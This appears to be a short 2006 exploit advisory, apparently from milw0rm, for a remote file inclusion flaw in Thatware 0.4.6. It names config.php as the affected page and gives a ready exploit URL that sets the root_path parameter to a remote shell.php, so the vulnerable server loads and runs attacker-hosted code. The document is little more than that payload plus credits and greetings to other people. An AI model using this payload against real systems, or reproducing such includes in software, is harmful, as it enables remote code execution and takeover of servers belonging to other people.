18 lines
No EOL
319 B
Text
18 lines
No EOL
319 B
Text
Thatware 0.4.6 (root_path) Remote File Inclusion
|
|
|
|
CreW: ToXiC
|
|
|
|
Bug Found by Drago84
|
|
|
|
Source Code:
|
|
http://ufpr.dl.sourceforge.net/sourceforge/thatware/thatware_0.4.6.tar.gz
|
|
|
|
Page Affect
|
|
config.php
|
|
|
|
ExP:
|
|
http://server/dir_thatware/config.php?root_path=http://server/shell.php'
|
|
|
|
Greatz: str0ke
|
|
|
|
# milw0rm.com [2006-08-10] |